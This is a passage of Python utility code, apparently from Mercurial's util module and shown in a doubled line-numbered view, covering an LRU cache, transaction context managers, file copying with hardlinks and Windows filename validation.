1161 class cowsortdict(cow, sortdict):
1161 class cowsortdict(cow, sortdict):
1162 """copy-on-write sortdict
1162 """copy-on-write sortdict
1163
1163
1164 Be sure to call d = d.preparewrite() before writing to d.
1164 Be sure to call d = d.preparewrite() before writing to d.
1165 """
1165 """
1166
1166
1167 class transactional(object):
1167 class transactional(object):
1168 """Base class for making a transactional type into a context manager."""
1168 """Base class for making a transactional type into a context manager."""
1169 __metaclass__ = abc.ABCMeta
1169 __metaclass__ = abc.ABCMeta
1170
1170
1171 @abc.abstractmethod
1171 @abc.abstractmethod
1172 def close(self):
1172 def close(self):
1173 """Successfully closes the transaction."""
1173 """Successfully closes the transaction."""
1174
1174
1175 @abc.abstractmethod
1175 @abc.abstractmethod
1176 def release(self):
1176 def release(self):
1177 """Marks the end of the transaction.
1177 """Marks the end of the transaction.
1178
1178
1179 If the transaction has not been closed, it will be aborted.
1179 If the transaction has not been closed, it will be aborted.
1180 """
1180 """
1181
1181
1182 def __enter__(self):
1182 def __enter__(self):
1183 return self
1183 return self
1184
1184
1185 def __exit__(self, exc_type, exc_val, exc_tb):
1185 def __exit__(self, exc_type, exc_val, exc_tb):
1186 try:
1186 try:
1187 if exc_type is None:
1187 if exc_type is None:
1188 self.close()
1188 self.close()
1189 finally:
1189 finally:
1190 self.release()
1190 self.release()
1191
1191
1192 @contextlib.contextmanager
1192 @contextlib.contextmanager
1193 def acceptintervention(tr=None):
1193 def acceptintervention(tr=None):
1194 """A context manager that closes the transaction on InterventionRequired
1194 """A context manager that closes the transaction on InterventionRequired
1195
1195
1196 If no transaction was provided, this simply runs the body and returns
1196 If no transaction was provided, this simply runs the body and returns
1197 """
1197 """
1198 if not tr:
1198 if not tr:
1199 yield
1199 yield
1200 return
1200 return
1201 try:
1201 try:
1202 yield
1202 yield
1203 tr.close()
1203 tr.close()
1204 except error.InterventionRequired:
1204 except error.InterventionRequired:
1205 tr.close()
1205 tr.close()
1206 raise
1206 raise
1207 finally:
1207 finally:
1208 tr.release()
1208 tr.release()
1209
1209
1210 @contextlib.contextmanager
1210 @contextlib.contextmanager
1211 def nullcontextmanager():
1211 def nullcontextmanager():
1212 yield
1212 yield
1213
1213
1214 class _lrucachenode(object):
1214 class _lrucachenode(object):
1215 """A node in a doubly linked list.
1215 """A node in a doubly linked list.
1216
1216
1217 Holds a reference to nodes on either side as well as a key-value
1217 Holds a reference to nodes on either side as well as a key-value
1218 pair for the dictionary entry.
1218 pair for the dictionary entry.
1219 """
1219 """
1220 __slots__ = (u'next', u'prev', u'key', u'value')
1220 __slots__ = (u'next', u'prev', u'key', u'value')
1221
1221
1222 def __init__(self):
1222 def __init__(self):
1223 self.next = None
1223 self.next = None
1224 self.prev = None
1224 self.prev = None
1225
1225
1226 self.key = _notset
1226 self.key = _notset
1227 self.value = None
1227 self.value = None
1228
1228
1229 def markempty(self):
1229 def markempty(self):
1230 """Mark the node as emptied."""
1230 """Mark the node as emptied."""
1231 self.key = _notset
1231 self.key = _notset
1232
1232
1233 class lrucachedict(object):
1233 class lrucachedict(object):
1234 """Dict that caches most recent accesses and sets.
1234 """Dict that caches most recent accesses and sets.
1235
1235
1236 The dict consists of an actual backing dict - indexed by original
1236 The dict consists of an actual backing dict - indexed by original
1237 key - and a doubly linked circular list defining the order of entries in
1237 key - and a doubly linked circular list defining the order of entries in
1238 the cache.
1238 the cache.
1239
1239
1240 The head node is the newest entry in the cache. If the cache is full,
1240 The head node is the newest entry in the cache. If the cache is full,
1241 we recycle head.prev and make it the new head. Cache accesses result in
1241 we recycle head.prev and make it the new head. Cache accesses result in
1242 the node being moved to before the existing head and being marked as the
1242 the node being moved to before the existing head and being marked as the
1243 new head node.
1243 new head node.
1244 """
1244 """
1245 def __init__(self, max):
1245 def __init__(self, max):
1246 self._cache = {}
1246 self._cache = {}
1247
1247
1248 self._head = head = _lrucachenode()
1248 self._head = head = _lrucachenode()
1249 head.prev = head
1249 head.prev = head
1250 head.next = head
1250 head.next = head
1251 self._size = 1
1251 self._size = 1
1252 self._capacity = max
1252 self._capacity = max
1253
1253
1254 def __len__(self):
1254 def __len__(self):
1255 return len(self._cache)
1255 return len(self._cache)
1256
1256
1257 def __contains__(self, k):
1257 def __contains__(self, k):
1258 return k in self._cache
1258 return k in self._cache
1259
1259
1260 def __iter__(self):
1260 def __iter__(self):
1261 # We don't have to iterate in cache order, but why not.
1261 # We don't have to iterate in cache order, but why not.
1262 n = self._head
1262 n = self._head
1263 for i in range(len(self._cache)):
1263 for i in range(len(self._cache)):
1264 yield n.key
1264 yield n.key
1265 n = n.next
1265 n = n.next
1266
1266
1267 def __getitem__(self, k):
1267 def __getitem__(self, k):
1268 node = self._cache[k]
1268 node = self._cache[k]
1269 self._movetohead(node)
1269 self._movetohead(node)
1270 return node.value
1270 return node.value
1271
1271
1272 def __setitem__(self, k, v):
1272 def __setitem__(self, k, v):
1273 node = self._cache.get(k)
1273 node = self._cache.get(k)
1274 # Replace existing value and mark as newest.
1274 # Replace existing value and mark as newest.
1275 if node is not None:
1275 if node is not None:
1276 node.value = v
1276 node.value = v
1277 self._movetohead(node)
1277 self._movetohead(node)
1278 return
1278 return
1279
1279
1280 if self._size < self._capacity:
1280 if self._size < self._capacity:
1281 node = self._addcapacity()
1281 node = self._addcapacity()
1282 else:
1282 else:
1283 # Grab the last/oldest item.
1283 # Grab the last/oldest item.
1284 node = self._head.prev
1284 node = self._head.prev
1285
1285
1286 # At capacity. Kill the old entry.
1286 # At capacity. Kill the old entry.
1287 if node.key is not _notset:
1287 if node.key is not _notset:
1288 del self._cache[node.key]
1288 del self._cache[node.key]
1289
1289
1290 node.key = k
1290 node.key = k
1291 node.value = v
1291 node.value = v
1292 self._cache[k] = node
1292 self._cache[k] = node
1293 # And mark it as newest entry. No need to adjust order since it
1293 # And mark it as newest entry. No need to adjust order since it
1294 # is already self._head.prev.
1294 # is already self._head.prev.
1295 self._head = node
1295 self._head = node
1296
1296
1297 def __delitem__(self, k):
1297 def __delitem__(self, k):
1298 node = self._cache.pop(k)
1298 node = self._cache.pop(k)
1299 node.markempty()
1299 node.markempty()
1300
1300
1301 # Temporarily mark as newest item before re-adjusting head to make
1301 # Temporarily mark as newest item before re-adjusting head to make
1302 # this node the oldest item.
1302 # this node the oldest item.
1303 self._movetohead(node)
1303 self._movetohead(node)
1304 self._head = node.next
1304 self._head = node.next
1305
1305
1306 # Additional dict methods.
1306 # Additional dict methods.
1307
1307
1308 def get(self, k, default=None):
1308 def get(self, k, default=None):
1309 try:
1309 try:
1310 return self._cache[k].value
1310 return self._cache[k].value
1311 except KeyError:
1311 except KeyError:
1312 return default
1312 return default
1313
1313
1314 def clear(self):
1314 def clear(self):
1315 n = self._head
1315 n = self._head
1316 while n.key is not _notset:
1316 while n.key is not _notset:
1317 n.markempty()
1317 n.markempty()
1318 n = n.next
1318 n = n.next
1319
1319
1320 self._cache.clear()
1320 self._cache.clear()
1321
1321
1322 def copy(self):
1322 def copy(self):
1323 result = lrucachedict(self._capacity)
1323 result = lrucachedict(self._capacity)
1324 n = self._head.prev
1324 n = self._head.prev
1325 # Iterate in oldest-to-newest order, so the copy has the right ordering
1325 # Iterate in oldest-to-newest order, so the copy has the right ordering
1326 for i in range(len(self._cache)):
1326 for i in range(len(self._cache)):
1327 result[n.key] = n.value
1327 result[n.key] = n.value
1328 n = n.prev
1328 n = n.prev
1329 return result
1329 return result
1330
1330
1331 def _movetohead(self, node):
1331 def _movetohead(self, node):
1332 """Mark a node as the newest, making it the new head.
1332 """Mark a node as the newest, making it the new head.
1333
1333
1334 When a node is accessed, it becomes the freshest entry in the LRU
1334 When a node is accessed, it becomes the freshest entry in the LRU
1335 list, which is denoted by self._head.
1335 list, which is denoted by self._head.
1336
1336
1337 Visually, let's make ``N`` the new head node (* denotes head):
1337 Visually, let's make ``N`` the new head node (* denotes head):
1338
1338
1339 previous/oldest <-> head <-> next/next newest
1339 previous/oldest <-> head <-> next/next newest
1340
1340
1341 ----<->--- A* ---<->-----
1341 ----<->--- A* ---<->-----
1342 | |
1342 | |
1343 E <-> D <-> N <-> C <-> B
1343 E <-> D <-> N <-> C <-> B
1344
1344
1345 To:
1345 To:
1346
1346
1347 ----<->--- N* ---<->-----
1347 ----<->--- N* ---<->-----
1348 | |
1348 | |
1349 E <-> D <-> C <-> B <-> A
1349 E <-> D <-> C <-> B <-> A
1350
1350
1351 This requires the following moves:
1351 This requires the following moves:
1352
1352
1353 C.next = D (node.prev.next = node.next)
1353 C.next = D (node.prev.next = node.next)
1354 D.prev = C (node.next.prev = node.prev)
1354 D.prev = C (node.next.prev = node.prev)
1355 E.next = N (head.prev.next = node)
1355 E.next = N (head.prev.next = node)
1356 N.prev = E (node.prev = head.prev)
1356 N.prev = E (node.prev = head.prev)
1357 N.next = A (node.next = head)
1357 N.next = A (node.next = head)
1358 A.prev = N (head.prev = node)
1358 A.prev = N (head.prev = node)
1359 """
1359 """
1360 head = self._head
1360 head = self._head
1361 # C.next = D
1361 # C.next = D
1362 node.prev.next = node.next
1362 node.prev.next = node.next
1363 # D.prev = C
1363 # D.prev = C
1364 node.next.prev = node.prev
1364 node.next.prev = node.prev
1365 # N.prev = E
1365 # N.prev = E
1366 node.prev = head.prev
1366 node.prev = head.prev
1367 # N.next = A
1367 # N.next = A
1368 # It is tempting to do just "head" here, however if node is
1368 # It is tempting to do just "head" here, however if node is
1369 # adjacent to head, this will do bad things.
1369 # adjacent to head, this will do bad things.
1370 node.next = head.prev.next
1370 node.next = head.prev.next
1371 # E.next = N
1371 # E.next = N
1372 node.next.prev = node
1372 node.next.prev = node
1373 # A.prev = N
1373 # A.prev = N
1374 node.prev.next = node
1374 node.prev.next = node
1375
1375
1376 self._head = node
1376 self._head = node
1377
1377
1378 def _addcapacity(self):
1378 def _addcapacity(self):
1379 """Add a node to the circular linked list.
1379 """Add a node to the circular linked list.
1380
1380
1381 The new node is inserted before the head node.
1381 The new node is inserted before the head node.
1382 """
1382 """
1383 head = self._head
1383 head = self._head
1384 node = _lrucachenode()
1384 node = _lrucachenode()
1385 head.prev.next = node
1385 head.prev.next = node
1386 node.prev = head.prev
1386 node.prev = head.prev
1387 node.next = head
1387 node.next = head
1388 head.prev = node
1388 head.prev = node
1389 self._size += 1
1389 self._size += 1
1390 return node
1390 return node
1391
1391
1392 def lrucachefunc(func):
1392 def lrucachefunc(func):
1393 '''cache most recent results of function calls'''
1393 '''cache most recent results of function calls'''
1394 cache = {}
1394 cache = {}
1395 order = collections.deque()
1395 order = collections.deque()
1396 if func.__code__.co_argcount == 1:
1396 if func.__code__.co_argcount == 1:
1397 def f(arg):
1397 def f(arg):
1398 if arg not in cache:
1398 if arg not in cache:
1399 if len(cache) > 20:
1399 if len(cache) > 20:
1400 del cache[order.popleft()]
1400 del cache[order.popleft()]
1401 cache[arg] = func(arg)
1401 cache[arg] = func(arg)
1402 else:
1402 else:
1403 order.remove(arg)
1403 order.remove(arg)
1404 order.append(arg)
1404 order.append(arg)
1405 return cache[arg]
1405 return cache[arg]
1406 else:
1406 else:
1407 def f(*args):
1407 def f(*args):
1408 if args not in cache:
1408 if args not in cache:
1409 if len(cache) > 20:
1409 if len(cache) > 20:
1410 del cache[order.popleft()]
1410 del cache[order.popleft()]
1411 cache[args] = func(*args)
1411 cache[args] = func(*args)
1412 else:
1412 else:
1413 order.remove(args)
1413 order.remove(args)
1414 order.append(args)
1414 order.append(args)
1415 return cache[args]
1415 return cache[args]
1416
1416
1417 return f
1417 return f
1418
1418
1419 class propertycache(object):
1419 class propertycache(object):
1420 def __init__(self, func):
1420 def __init__(self, func):
1421 self.func = func
1421 self.func = func
1422 self.name = func.__name__
1422 self.name = func.__name__
1423 def __get__(self, obj, type=None):
1423 def __get__(self, obj, type=None):
1424 result = self.func(obj)
1424 result = self.func(obj)
1425 self.cachevalue(obj, result)
1425 self.cachevalue(obj, result)
1426 return result
1426 return result
1427
1427
1428 def cachevalue(self, obj, value):
1428 def cachevalue(self, obj, value):
1429 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1429 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1430 obj.__dict__[self.name] = value
1430 obj.__dict__[self.name] = value
1431
1431
1432 def clearcachedproperty(obj, prop):
1432 def clearcachedproperty(obj, prop):
1433 '''clear a cached property value, if one has been set'''
1433 '''clear a cached property value, if one has been set'''
1434 if prop in obj.__dict__:
1434 if prop in obj.__dict__:
1435 del obj.__dict__[prop]
1435 del obj.__dict__[prop]
1436
1436
1437 def increasingchunks(source, min=1024, max=65536):
1437 def increasingchunks(source, min=1024, max=65536):
1438 '''return no less than min bytes per chunk while data remains,
1438 '''return no less than min bytes per chunk while data remains,
1439 doubling min after each chunk until it reaches max'''
1439 doubling min after each chunk until it reaches max'''
1440 def log2(x):
1440 def log2(x):
1441 if not x:
1441 if not x:
1442 return 0
1442 return 0
1443 i = 0
1443 i = 0
1444 while x:
1444 while x:
1445 x >>= 1
1445 x >>= 1
1446 i += 1
1446 i += 1
1447 return i - 1
1447 return i - 1
1448
1448
1449 buf = []
1449 buf = []
1450 blen = 0
1450 blen = 0
1451 for chunk in source:
1451 for chunk in source:
1452 buf.append(chunk)
1452 buf.append(chunk)
1453 blen += len(chunk)
1453 blen += len(chunk)
1454 if blen >= min:
1454 if blen >= min:
1455 if min < max:
1455 if min < max:
1456 min = min << 1
1456 min = min << 1
1457 nmin = 1 << log2(blen)
1457 nmin = 1 << log2(blen)
1458 if nmin > min:
1458 if nmin > min:
1459 min = nmin
1459 min = nmin
1460 if min > max:
1460 if min > max:
1461 min = max
1461 min = max
1462 yield ''.join(buf)
1462 yield ''.join(buf)
1463 blen = 0
1463 blen = 0
1464 buf = []
1464 buf = []
1465 if buf:
1465 if buf:
1466 yield ''.join(buf)
1466 yield ''.join(buf)
1467
1467
1468 def always(fn):
1468 def always(fn):
1469 return True
1469 return True
1470
1470
1471 def never(fn):
1471 def never(fn):
1472 return False
1472 return False
1473
1473
1474 def nogc(func):
1474 def nogc(func):
1475 """disable garbage collector
1475 """disable garbage collector
1476
1476
1477 Python's garbage collector triggers a GC each time a certain number of
1477 Python's garbage collector triggers a GC each time a certain number of
1478 container objects (the number being defined by gc.get_threshold()) are
1478 container objects (the number being defined by gc.get_threshold()) are
1479 allocated even when marked not to be tracked by the collector. Tracking has
1479 allocated even when marked not to be tracked by the collector. Tracking has
1480 no effect on when GCs are triggered, only on what objects the GC looks
1480 no effect on when GCs are triggered, only on what objects the GC looks
1481 into. As a workaround, disable GC while building complex (huge)
1481 into. As a workaround, disable GC while building complex (huge)
1482 containers.
1482 containers.
1483
1483
1484 This garbage collector issue have been fixed in 2.7. But it still affect
1484 This garbage collector issue have been fixed in 2.7. But it still affect
1485 CPython's performance.
1485 CPython's performance.
1486 """
1486 """
1487 def wrapper(*args, **kwargs):
1487 def wrapper(*args, **kwargs):
1488 gcenabled = gc.isenabled()
1488 gcenabled = gc.isenabled()
1489 gc.disable()
1489 gc.disable()
1490 try:
1490 try:
1491 return func(*args, **kwargs)
1491 return func(*args, **kwargs)
1492 finally:
1492 finally:
1493 if gcenabled:
1493 if gcenabled:
1494 gc.enable()
1494 gc.enable()
1495 return wrapper
1495 return wrapper
1496
1496
1497 if pycompat.ispypy:
1497 if pycompat.ispypy:
1498 # PyPy runs slower with gc disabled
1498 # PyPy runs slower with gc disabled
1499 nogc = lambda x: x
1499 nogc = lambda x: x
1500
1500
1501 def pathto(root, n1, n2):
1501 def pathto(root, n1, n2):
1502 '''return the relative path from one place to another.
1502 '''return the relative path from one place to another.
1503 root should use os.sep to separate directories
1503 root should use os.sep to separate directories
1504 n1 should use os.sep to separate directories
1504 n1 should use os.sep to separate directories
1505 n2 should use "/" to separate directories
1505 n2 should use "/" to separate directories
1506 returns an os.sep-separated path.
1506 returns an os.sep-separated path.
1507
1507
1508 If n1 is a relative path, it's assumed it's
1508 If n1 is a relative path, it's assumed it's
1509 relative to root.
1509 relative to root.
1510 n2 should always be relative to root.
1510 n2 should always be relative to root.
1511 '''
1511 '''
1512 if not n1:
1512 if not n1:
1513 return localpath(n2)
1513 return localpath(n2)
1514 if os.path.isabs(n1):
1514 if os.path.isabs(n1):
1515 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1515 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1516 return os.path.join(root, localpath(n2))
1516 return os.path.join(root, localpath(n2))
1517 n2 = '/'.join((pconvert(root), n2))
1517 n2 = '/'.join((pconvert(root), n2))
1518 a, b = splitpath(n1), n2.split('/')
1518 a, b = splitpath(n1), n2.split('/')
1519 a.reverse()
1519 a.reverse()
1520 b.reverse()
1520 b.reverse()
1521 while a and b and a[-1] == b[-1]:
1521 while a and b and a[-1] == b[-1]:
1522 a.pop()
1522 a.pop()
1523 b.pop()
1523 b.pop()
1524 b.reverse()
1524 b.reverse()
1525 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1525 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1526
1526
1527 # the location of data files matching the source code
1527 # the location of data files matching the source code
1528 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1528 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1529 # executable version (py2exe) doesn't support __file__
1529 # executable version (py2exe) doesn't support __file__
1530 datapath = os.path.dirname(pycompat.sysexecutable)
1530 datapath = os.path.dirname(pycompat.sysexecutable)
1531 else:
1531 else:
1532 datapath = os.path.dirname(pycompat.fsencode(__file__))
1532 datapath = os.path.dirname(pycompat.fsencode(__file__))
1533
1533
1534 i18n.setdatapath(datapath)
1534 i18n.setdatapath(datapath)
1535
1535
1536 def checksignature(func):
1536 def checksignature(func):
1537 '''wrap a function with code to check for calling errors'''
1537 '''wrap a function with code to check for calling errors'''
1538 def check(*args, **kwargs):
1538 def check(*args, **kwargs):
1539 try:
1539 try:
1540 return func(*args, **kwargs)
1540 return func(*args, **kwargs)
1541 except TypeError:
1541 except TypeError:
1542 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1542 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1543 raise error.SignatureError
1543 raise error.SignatureError
1544 raise
1544 raise
1545
1545
1546 return check
1546 return check
1547
1547
1548 # a whilelist of known filesystems where hardlink works reliably
1548 # a whilelist of known filesystems where hardlink works reliably
1549 _hardlinkfswhitelist = {
1549 _hardlinkfswhitelist = {
1550 'apfs',
1550 'apfs',
1551 'btrfs',
1551 'btrfs',
1552 'ext2',
1552 'ext2',
1553 'ext3',
1553 'ext3',
1554 'ext4',
1554 'ext4',
1555 'hfs',
1555 'hfs',
1556 'jfs',
1556 'jfs',
1557 'NTFS',
1557 'NTFS',
1558 'reiserfs',
1558 'reiserfs',
1559 'tmpfs',
1559 'tmpfs',
1560 'ufs',
1560 'ufs',
1561 'xfs',
1561 'xfs',
1562 'zfs',
1562 'zfs',
1563 }
1563 }
1564
1564
1565 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1565 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1566 '''copy a file, preserving mode and optionally other stat info like
1566 '''copy a file, preserving mode and optionally other stat info like
1567 atime/mtime
1567 atime/mtime
1568
1568
1569 checkambig argument is used with filestat, and is useful only if
1569 checkambig argument is used with filestat, and is useful only if
1570 destination file is guarded by any lock (e.g. repo.lock or
1570 destination file is guarded by any lock (e.g. repo.lock or
1571 repo.wlock).
1571 repo.wlock).
1572
1572
1573 copystat and checkambig should be exclusive.
1573 copystat and checkambig should be exclusive.
1574 '''
1574 '''
1575 assert not (copystat and checkambig)
1575 assert not (copystat and checkambig)
1576 oldstat = None
1576 oldstat = None
1577 if os.path.lexists(dest):
1577 if os.path.lexists(dest):
1578 if checkambig:
1578 if checkambig:
1579 oldstat = checkambig and filestat.frompath(dest)
1579 oldstat = checkambig and filestat.frompath(dest)
1580 unlink(dest)
1580 unlink(dest)
1581 if hardlink:
1581 if hardlink:
1582 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1582 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1583 # unless we are confident that dest is on a whitelisted filesystem.
1583 # unless we are confident that dest is on a whitelisted filesystem.
1584 try:
1584 try:
1585 fstype = getfstype(os.path.dirname(dest))
1585 fstype = getfstype(os.path.dirname(dest))
1586 except OSError:
1586 except OSError:
1587 fstype = None
1587 fstype = None
1588 if fstype not in _hardlinkfswhitelist:
1588 if fstype not in _hardlinkfswhitelist:
1589 hardlink = False
1589 hardlink = False
1590 if hardlink:
1590 if hardlink:
1591 try:
1591 try:
1592 oslink(src, dest)
1592 oslink(src, dest)
1593 return
1593 return
1594 except (IOError, OSError):
1594 except (IOError, OSError):
1595 pass # fall back to normal copy
1595 pass # fall back to normal copy
1596 if os.path.islink(src):
1596 if os.path.islink(src):
1597 os.symlink(os.readlink(src), dest)
1597 os.symlink(os.readlink(src), dest)
1598 # copytime is ignored for symlinks, but in general copytime isn't needed
1598 # copytime is ignored for symlinks, but in general copytime isn't needed
1599 # for them anyway
1599 # for them anyway
1600 else:
1600 else:
1601 try:
1601 try:
1602 shutil.copyfile(src, dest)
1602 shutil.copyfile(src, dest)
1603 if copystat:
1603 if copystat:
1604 # copystat also copies mode
1604 # copystat also copies mode
1605 shutil.copystat(src, dest)
1605 shutil.copystat(src, dest)
1606 else:
1606 else:
1607 shutil.copymode(src, dest)
1607 shutil.copymode(src, dest)
1608 if oldstat and oldstat.stat:
1608 if oldstat and oldstat.stat:
1609 newstat = filestat.frompath(dest)
1609 newstat = filestat.frompath(dest)
1610 if newstat.isambig(oldstat):
1610 if newstat.isambig(oldstat):
1611 # stat of copied file is ambiguous to original one
1611 # stat of copied file is ambiguous to original one
1612 advanced = (
1612 advanced = (
1613 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1613 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1614 os.utime(dest, (advanced, advanced))
1614 os.utime(dest, (advanced, advanced))
1615 except shutil.Error as inst:
1615 except shutil.Error as inst:
1616 raise error.Abort(str(inst))
1616 raise error.Abort(str(inst))
1617
1617
1618 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1618 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1619 """Copy a directory tree using hardlinks if possible."""
1619 """Copy a directory tree using hardlinks if possible."""
1620 num = 0
1620 num = 0
1621
1621
1622 gettopic = lambda: hardlink and _('linking') or _('copying')
1622 gettopic = lambda: hardlink and _('linking') or _('copying')
1623
1623
1624 if os.path.isdir(src):
1624 if os.path.isdir(src):
1625 if hardlink is None:
1625 if hardlink is None:
1626 hardlink = (os.stat(src).st_dev ==
1626 hardlink = (os.stat(src).st_dev ==
1627 os.stat(os.path.dirname(dst)).st_dev)
1627 os.stat(os.path.dirname(dst)).st_dev)
1628 topic = gettopic()
1628 topic = gettopic()
1629 os.mkdir(dst)
1629 os.mkdir(dst)
1630 for name, kind in listdir(src):
1630 for name, kind in listdir(src):
1631 srcname = os.path.join(src, name)
1631 srcname = os.path.join(src, name)
1632 dstname = os.path.join(dst, name)
1632 dstname = os.path.join(dst, name)
1633 def nprog(t, pos):
1633 def nprog(t, pos):
1634 if pos is not None:
1634 if pos is not None:
1635 return progress(t, pos + num)
1635 return progress(t, pos + num)
1636 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1636 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1637 num += n
1637 num += n
1638 else:
1638 else:
1639 if hardlink is None:
1639 if hardlink is None:
1640 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1640 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1641 os.stat(os.path.dirname(dst)).st_dev)
1641 os.stat(os.path.dirname(dst)).st_dev)
1642 topic = gettopic()
1642 topic = gettopic()
1643
1643
1644 if hardlink:
1644 if hardlink:
1645 try:
1645 try:
1646 oslink(src, dst)
1646 oslink(src, dst)
1647 except (IOError, OSError):
1647 except (IOError, OSError):
1648 hardlink = False
1648 hardlink = False
1649 shutil.copy(src, dst)
1649 shutil.copy(src, dst)
1650 else:
1650 else:
1651 shutil.copy(src, dst)
1651 shutil.copy(src, dst)
1652 num += 1
1652 num += 1
1653 progress(topic, num)
1653 progress(topic, num)
1654 progress(topic, None)
1654 progress(topic, None)
1655
1655
1656 return hardlink, num
1656 return hardlink, num
1657
1657
1658 _winreservednames = {
1658 _winreservednames = {
1659 'con', 'prn', 'aux', 'nul',
1659 'con', 'prn', 'aux', 'nul',
1660 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1660 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1661 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1661 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1662 }
1662 }
1663 _winreservedchars = ':*?"<>|'
1663 _winreservedchars = ':*?"<>|'
1664 def checkwinfilename(path):
1664 def checkwinfilename(path):
1665 r'''Check that the base-relative path is a valid filename on Windows.
1665 r'''Check that the base-relative path is a valid filename on Windows.
1666 Returns None if the path is ok, or a UI string describing the problem.
1666 Returns None if the path is ok, or a UI string describing the problem.
1667
1667
1668 >>> checkwinfilename(b"just/a/normal/path")
1668 >>> checkwinfilename(b"just/a/normal/path")
1669 >>> checkwinfilename(b"foo/bar/con.xml")
1669 >>> checkwinfilename(b"foo/bar/con.xml")
1670 "filename contains 'con', which is reserved on Windows"
1670 "filename contains 'con', which is reserved on Windows"
1671 >>> checkwinfilename(b"foo/con.xml/bar")
1671 >>> checkwinfilename(b"foo/con.xml/bar")
1672 "filename contains 'con', which is reserved on Windows"
1672 "filename contains 'con', which is reserved on Windows"
1673 >>> checkwinfilename(b"foo/bar/xml.con")
1673 >>> checkwinfilename(b"foo/bar/xml.con")
1674 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1674 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1675 "filename contains 'AUX', which is reserved on Windows"
1675 "filename contains 'AUX', which is reserved on Windows"
1676 >>> checkwinfilename(b"foo/bar/bla:.txt")
1676 >>> checkwinfilename(b"foo/bar/bla:.txt")
1677 "filename contains ':', which is reserved on Windows"
1677 "filename contains ':', which is reserved on Windows"
1678 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1678 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1679 "filename contains '\\x07', which is invalid on Windows"
1679 "filename contains '\\x07', which is invalid on Windows"
1680 >>> checkwinfilename(b"foo/bar/bla ")
1680 >>> checkwinfilename(b"foo/bar/bla ")
1681 "filename ends with ' ', which is not allowed on Windows"
1681 "filename ends with ' ', which is not allowed on Windows"
1682 >>> checkwinfilename(b"../bar")
1682 >>> checkwinfilename(b"../bar")
1683 >>> checkwinfilename(b"foo\\")
1683 >>> checkwinfilename(b"foo\\")
1684 "filename ends with '\\', which is invalid on Windows"
1684 "filename ends with '\\', which is invalid on Windows"
1685 >>> checkwinfilename(b"foo\\/bar")
1685 >>> checkwinfilename(b"foo\\/bar")
1686 "directory name ends with '\\', which is invalid on Windows"
1686 "directory name ends with '\\', which is invalid on Windows"
1687 '''
1687 '''
1688 if path.endswith('\\'):
1688 if path.endswith('\\'):
1689 return _("filename ends with '\\', which is invalid on Windows")
1689 return _("filename ends with '\\', which is invalid on Windows")
1690 if '\\/' in path:
1690 if '\\/' in path:
1691 return _("directory name ends with '\\', which is invalid on Windows")
1691 return _("directory name ends with '\\', which is invalid on Windows")
1692 for n in path.replace('\\', '/').split('/'):
1692 for n in path.replace('\\', '/').split('/'):
1693 if not n:
1693 if not n:
1694 continue
1694 continue
1695 for c in _filenamebytestr(n):
1695 for c in _filenamebytestr(n):
1696 if c in _winreservedchars:
1696 if c in _winreservedchars:
1697 return _("filename contains '%s', which is reserved "
1697 return _("filename contains '%s', which is reserved "
1698 "on Windows") % c
1698 "on Windows") % c
1699 if ord(c) <= 31:
1699 if ord(c) <= 31:
1700 return _("filename contains '%s', which is invalid "
1700 return _("filename contains '%s', which is invalid "
1701 "on Windows") % stringutil.escapestr(c)
1701 "on Windows") % stringutil.escapestr(c)
1702 base = n.split('.')[0]
1702 base = n.split('.')[0]
1703 if base and base.lower() in _winreservednames:
1703 if base and base.lower() in _winreservednames:
1704 return _("filename contains '%s', which is reserved "
1704 return _("filename contains '%s', which is reserved "
1705 "on Windows") % base
1705 "on Windows") % base
1706 t = n[-1:]
1706 t = n[-1:]
1707 if t in '. ' and n not in '..':
1707 if t in '. ' and n not in '..':
1708 return _("filename ends with '%s', which is not allowed "
1708 return _("filename ends with '%s', which is not allowed "
1709 "on Windows") % t
1709 "on Windows") % t
1710
1710
1711 if pycompat.iswindows:
1711 if pycompat.iswindows:
1712 checkosfilename = checkwinfilename
1712 checkosfilename = checkwinfilename
1713 timer = time.clock
1713 timer = time.clock
1714 else:
1714 else:
1715 checkosfilename = platform.checkosfilename
1715 checkosfilename = platform.checkosfilename
1716 timer = time.time
1716 timer = time.time
1717
1717
1718 if safehasattr(time, "perf_counter"):
1718 if safehasattr(time, "perf_counter"):
1719 timer = time.perf_counter
1719 timer = time.perf_counter
1720
1720
1721 def makelock(info, pathname):
1721 def makelock(info, pathname):
1722 """Create a lock file atomically if possible
1722 """Create a lock file atomically if possible
1723
1723
1724 This may leave a stale lock file if symlink isn't supported and signal
1724 This may leave a stale lock file if symlink isn't supported and signal
1725 interrupt is enabled.
1725 interrupt is enabled.
1726 """
1726 """
1727 try:
1727 try:
1728 return os.symlink(info, pathname)
